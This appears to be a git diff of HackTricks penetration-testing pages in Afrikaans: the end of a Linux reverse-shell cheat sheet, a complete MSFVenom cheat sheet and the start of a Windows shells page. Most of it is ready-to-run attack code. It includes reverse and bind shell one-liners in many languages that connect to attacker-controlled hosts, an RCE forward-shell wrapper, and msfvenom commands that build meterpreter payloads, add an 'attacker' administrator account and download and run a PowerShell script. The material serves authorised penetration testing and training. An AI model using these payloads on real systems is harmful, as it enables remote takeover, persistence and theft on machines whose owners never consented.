Wanneer jy met 'n **Remote Code Execution (RCE)** kwesbaarheid binne 'n Linux-gebaseerde webtoepassing werk, kan die verkryging van 'n reverse shell belemmer word deur netwerkverdedigings soos iptables-reëls of ingewikkelde pakketfiltering meganismes. In sulke beperkte omgewings behels 'n alternatiewe benadering die vestiging van 'n PTY (Pseudo Terminal) shell om meer effektief met die gecompromitteerde stelsel te kommunikeer.
|
||||
|
||||
'n Aanbevole hulpmiddel vir hierdie doel is [toboggan](https://github.com/n3rada/toboggan.git), wat interaksie met die teikenomgewing vereenvoudig.
|
||||
|
||||
Om toboggan effektief te gebruik, skep 'n Python-module wat op die RCE-konteks van jou teikenstelsel aangepas is. Byvoorbeeld, 'n module genaamd `nix.py` kan as volg gestruktureer word:
|
||||
```python3
|
||||
import jwt
|
||||
import httpx
|
||||
|
||||
def execute(command: str, timeout: float = None) -> str:
|
||||
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
|
||||
token = jwt.encode(
|
||||
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
|
||||
)
|
||||
|
||||
response = httpx.get(
|
||||
url="https://vulnerable.io:3200",
|
||||
headers={"Authorization": f"Bearer {token}"},
|
||||
timeout=timeout,
|
||||
# ||BURP||
|
||||
verify=False,
|
||||
)
|
||||
|
||||
# Check if the request was successful
|
||||
response.raise_for_status()
|
||||
|
||||
return response.text
|
||||
```
|
||||
En dan kan jy uitvoer:
|
||||
```shell
|
||||
toboggan -m nix.py -i
|
||||
```
|
||||
Om 'n interaktiewe skulp direk te benut. Jy kan `-b` byvoeg vir Burpsuite integrasie en die `-i` verwyder vir 'n meer basiese rce-wrapper.
|
||||
|
||||
'n Ander moontlikheid bestaan uit die gebruik van die `IppSec` voorwaartse skulpimplementering [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell).
|
||||
|
||||
Jy moet net die volgende aanpas:
|
||||
|
||||
* Die URL van die kwesbare gasheer
|
||||
* Die voorvoegsel en agtervoegsel van jou payload (indien enige)
|
||||
* Die manier waarop die payload gestuur word (koppe? data? ekstra inligting?)
|
||||
|
||||
Dan kan jy net **opdragte stuur** of selfs **die `upgrade` opdrag gebruik** om 'n volle PTY te verkry (let daarop dat pype met 'n ongeveer 1.3s vertraging gelees en geskryf word).
|
||||
|
||||
## Netcat
|
||||
```bash
|
||||
nc -e /bin/sh <ATTACKER-IP> <PORT>
|
||||
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
|
||||
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
|
||||
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
|
||||
```
|
||||
## gsocket
|
||||
|
||||
Kyk dit in [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
|
||||
```bash
|
||||
bash -c "$(curl -fsSL gsocket.io/x)"
|
||||
```
|
||||
## Telnet
|
||||
```bash
|
||||
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
|
||||
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
|
||||
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
|
||||
```
|
||||
## Whois
|
||||
|
||||
**Aanvaller**
|
||||
```bash
|
||||
while true; do nc -l <port>; done
|
||||
```
|
||||
Om die opdrag te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop)
|
||||
|
||||
**Slachtoffer**
|
||||
```bash
|
||||
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
|
||||
```
|
||||
## Python
|
||||
```bash
|
||||
#Linux
|
||||
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
|
||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||
#IPv6
|
||||
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
|
||||
```
|
||||
## Perl
|
||||
```bash
|
||||
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
```
|
||||
## Ruby
|
||||
```bash
|
||||
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
```
|
||||
## PHP
|
||||
```php
|
||||
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
|
||||
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
|
||||
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
|
||||
// Using 'proc_open' makes no assumptions about what the file descriptor will be.
|
||||
// See https://security.stackexchange.com/a/198944 for more information
|
||||
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
|
||||
|
||||
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
|
||||
```
|
||||
## Java
|
||||
```bash
|
||||
r = Runtime.getRuntime()
|
||||
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
|
||||
p.waitFor()
|
||||
```
|
||||
## Ncat
|
||||
```bash
|
||||
victim> ncat <ip> <port,eg.443> --ssl -c "bash -i 2>&1"
|
||||
attacker> ncat -l <port,eg.443> --ssl
|
||||
```
|
||||
## Golang
|
||||
```bash
|
||||
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
|
||||
```
|
||||
## Lua
|
||||
```bash
|
||||
#Linux
|
||||
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
||||
#Windows & Linux
|
||||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
```
|
||||
## NodeJS
|
||||
```javascript
|
||||
(function(){
|
||||
var net = require("net"),
|
||||
cp = require("child_process"),
|
||||
sh = cp.spawn("/bin/sh", []);
|
||||
var client = new net.Socket();
|
||||
client.connect(8080, "10.17.26.64", function(){
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
});
|
||||
return /a/; // Prevents the Node.js application form crashing
|
||||
})();
|
||||
|
||||
|
||||
or
|
||||
|
||||
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
|
||||
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
|
||||
|
||||
or
|
||||
|
||||
-var x = global.process.mainModule.require
|
||||
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
|
||||
|
||||
or
|
||||
|
||||
// If you get to the constructor of a function you can define and execute another function inside a string
|
||||
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
|
||||
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
|
||||
|
||||
|
||||
or
|
||||
|
||||
// Abuse this syntax to get a reverse shell
|
||||
var fs = this.process.binding('fs');
|
||||
var fs = process.binding('fs');
|
||||
|
||||
or
|
||||
|
||||
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
|
||||
```
|
||||
## OpenSSL
|
||||
|
||||
Die Aanvaller (Kali)
|
||||
```bash
|
||||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
|
||||
```
|
||||
Die Slachtoffer
|
||||
```bash
|
||||
#Linux
|
||||
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
|
||||
#Windows
|
||||
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
```
|
||||
## **Socat**
|
||||
|
||||
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
|
||||
|
||||
### Bind shell
|
||||
```bash
|
||||
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
|
||||
```
|
||||
### Terugskakel
|
||||
```bash
|
||||
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
|
||||
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||
```
|
||||
## Awk
|
||||
```bash
|
||||
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
|
||||
```
|
||||
## Vinger
|
||||
|
||||
**Aanvaller**
|
||||
```bash
|
||||
while true; do nc -l 79; done
|
||||
```
|
||||
Om die opdrag te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop)
|
||||
|
||||
**Slachtoffer**
|
||||
```bash
|
||||
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
|
||||
|
||||
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
|
||||
```
|
||||
## Gawk
|
||||
```bash
|
||||
#!/usr/bin/gawk -f
|
||||
|
||||
BEGIN {
|
||||
Port = 8080
|
||||
Prompt = "bkd> "
|
||||
|
||||
Service = "/inet/tcp/" Port "/0/0"
|
||||
while (1) {
|
||||
do {
|
||||
printf Prompt |& Service
|
||||
Service |& getline cmd
|
||||
if (cmd) {
|
||||
while ((cmd |& getline) > 0)
|
||||
print $0 |& Service
|
||||
close(cmd)
|
||||
}
|
||||
} while (cmd != "exit")
|
||||
close(Service)
|
||||
}
|
||||
}
|
||||
```
|
||||
## Xterm
|
||||
|
||||
Dit sal probeer om met jou stelsel te verbind op poort 6001:
|
||||
```bash
|
||||
xterm -display 10.0.0.1:1
|
||||
```
|
||||
Om die omgekeerde skulp te vang kan jy gebruik (wat op poort 6001 sal luister):
|
||||
```bash
|
||||
# Authorize host
|
||||
xhost +targetip
|
||||
# Listen
|
||||
Xnest :1
|
||||
```
|
||||
## Groovy
|
||||
|
||||
deur [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) LET WEL: Java reverse shell werk ook vir Groovy
|
||||
```bash
|
||||
String host="localhost";
|
||||
int port=8044;
|
||||
String cmd="cmd.exe";
|
||||
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
|
||||
```
|
||||
## Verwysings
|
||||
|
||||
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
|
||||
* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell)
|
||||
* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/)
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||
|
||||
**Probeer Hard Sekuriteitsgroep**
|
||||
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Ondersteun HackTricks</summary>
|
||||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
242
generic-methodologies-and-resources/reverse-shells/msfvenom.md
Normal file
242
generic-methodologies-and-resources/reverse-shells/msfvenom.md
Normal file
|
@ -0,0 +1,242 @@
|
|||
# MSFVenom - CheatSheet
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Ondersteun HackTricks</summary>
|
||||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en bug bounty jagters!
|
||||
|
||||
**Hacking Inligting**\
|
||||
Betrek met inhoud wat die opwinding en uitdagings van hacking ondersoek
|
||||
|
||||
**Regte-Tyd Hack Nuus**\
|
||||
Bly op hoogte van die vinnige hacking wêreld deur regte-tyd nuus en insigte
|
||||
|
||||
**Laaste Aankondigings**\
|
||||
Bly ingelig oor die nuutste bug bounties wat bekendgestel word en belangrike platform opdaterings
|
||||
|
||||
**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
|
||||
|
||||
***
|
||||
|
||||
## Basiese msfvenom
|
||||
|
||||
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
|
||||
|
||||
Mens kan ook die `-a` gebruik om die argitektuur te spesifiseer of die `--platform`
|
||||
|
||||
## Lyste
|
||||
```bash
|
||||
msfvenom -l payloads #Payloads
|
||||
msfvenom -l encoders #Encoders
|
||||
```
|
||||
## Algemene parameters wanneer 'n shellcode geskep word
|
||||
```bash
|
||||
-b "\x00\x0a\x0d"
|
||||
-f c
|
||||
-e x86/shikata_ga_nai -i 5
|
||||
EXITFUNC=thread
|
||||
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
|
||||
```
|
||||
## **Windows**
|
||||
|
||||
### **Terug Shell**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Bind Shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
|
||||
```
|
||||
### Skep Gebruiker
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### CMD Shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
|
||||
```
|
||||
### **Voer Opdrag Uit**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
|
||||
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
|
||||
```
|
||||
### Encoder
|
||||
```bash
|
||||
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Ingebed binne uitvoerbare
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
## Linux Payloads
|
||||
|
||||
### Reverse Shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
|
||||
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Bind Shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
|
||||
```
|
||||
### SunOS (Solaris)
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
## **MAC Payloads**
|
||||
|
||||
### **Reverse Shell:**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### **Bind Shell**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
## **Web-gebaseerde Payloads**
|
||||
|
||||
### **PHP**
|
||||
|
||||
#### Terugskakel**l**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
|
||||
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### ASP/x
|
||||
|
||||
#### Terug shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### JSP
|
||||
|
||||
#### Terugskakel
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### OORLOG
|
||||
|
||||
#### Terug Shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### NodeJS
|
||||
```bash
|
||||
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
|
||||
```
|
||||
## **Script Taal payloads**
|
||||
|
||||
### **Perl**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
|
||||
```
|
||||
### **Python**
|
||||
```bash
|
||||
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py
|
||||
```
|
||||
### **Bash**
|
||||
```bash
|
||||
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en bug bounty jagters te kommunikeer!
|
||||
|
||||
**Hacking Inligting**\
|
||||
Betrek met inhoud wat die opwinding en uitdagings van hacking ondersoek
|
||||
|
||||
**Regte Tyd Hack Nuus**\
|
||||
Bly op hoogte van die vinnige hacking wêreld deur regte tyd nuus en insigte
|
||||
|
||||
**Laaste Aankondigings**\
|
||||
Bly ingelig oor die nuutste bug bounties wat bekendgestel word en belangrike platform opdaterings
|
||||
|
||||
**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Ondersteun HackTricks</summary>
|
||||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
506
generic-methodologies-and-resources/reverse-shells/windows.md
Normal file
506
generic-methodologies-and-resources/reverse-shells/windows.md
Normal file
|
@ -0,0 +1,506 @@
|
|||
# Shells - Windows
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Support HackTricks</summary>
|
||||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**Try Hard Security Group**
|
||||
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
***
|
||||
|
||||
## Lolbas
|
||||
|
||||
Die bladsy [lolbas-project.github.io](https://lolbas-project.github.io/) is vir Windows soos [https://gtfobins.github.io/](https://gtfobins.github.io/) vir linux.\
|
||||
Dit is duidelik, **daar is geen SUID lêers of sudo regte in Windows nie**, maar dit is nuttig om te weet **hoe** sommige **binaries** (mis)bruik kan word om 'n soort onverwagte aksies uit te voer soos **arbitraire kode uit te voer.**
|
||||
|
||||
## NC
|
||||
```bash
|
||||
nc.exe -e cmd.exe <Attacker_IP> <PORT>
|
||||
```
|
||||
## NCAT
|
||||
slagoffer
|
||||
```
|
||||
ncat.exe <Attacker_IP> <PORT> -e "cmd.exe /c (cmd.exe 2>&1)"
|
||||
#Encryption to bypass firewall
|
||||
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe 2>&1)"
|
||||
```
|
||||
aanvaller
|
||||
```
|
||||
ncat -l <PORT>
|
||||
#Encryption to bypass firewall
|
||||
ncat -l <PORT eg.443> --ssl
|
||||
```
|
||||
## SBD
|
||||
|
||||
**[sbd](https://www.kali.org/tools/sbd/) is 'n draagbare en veilige Netcat alternatief**. Dit werk op Unix-agtige stelsels en Win32. Met funksies soos sterk versleuteling, programuitvoering, aanpasbare bronpoorte, en deurlopende herverbinding, bied sbd 'n veelsydige oplossing vir TCP/IP kommunikasie. Vir Windows gebruikers kan die sbd.exe weergawe van die Kali Linux verspreiding as 'n betroubare vervanging vir Netcat gebruik word.
|
||||
```bash
|
||||
# Victims machine
|
||||
sbd -l -p 4444 -e bash -v -n
|
||||
listening on port 4444
|
||||
|
||||
|
||||
# Atackers
|
||||
sbd 10.10.10.10 4444
|
||||
id
|
||||
